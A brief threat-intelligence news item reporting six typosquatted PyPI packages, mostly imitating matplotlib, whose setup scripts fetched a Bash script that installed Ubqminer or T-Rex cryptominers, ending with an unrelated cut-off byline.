Multiple PyPI packages installing cryptominers were caught this week by security researcher Ax Sharma. Six different packages, most of them impersonating the popular “matplotlib” Python package used to create graphs and visualizations, all used similar spellings or wording in an attempt to dupe unsuspecting victims into using the malicious package instead. In a blog post, Sharma found that the malicious setup.py files in the package installations were downloading a Bash script from a GitHub repository during the package installation. These scripts were downloading a cryptominer known as “Ubqminer” which mined for the Ubiq cryptocurrency. Another version of the malicious package installer opted for open-source T-Rex which allowed the attacker to use the victim’s GPU instead of the CPU when mining.
Written by: Nataliia Zdrok, Threat Intelligence Analyst at Binary Defense Russia’s invasion of Ukraine increased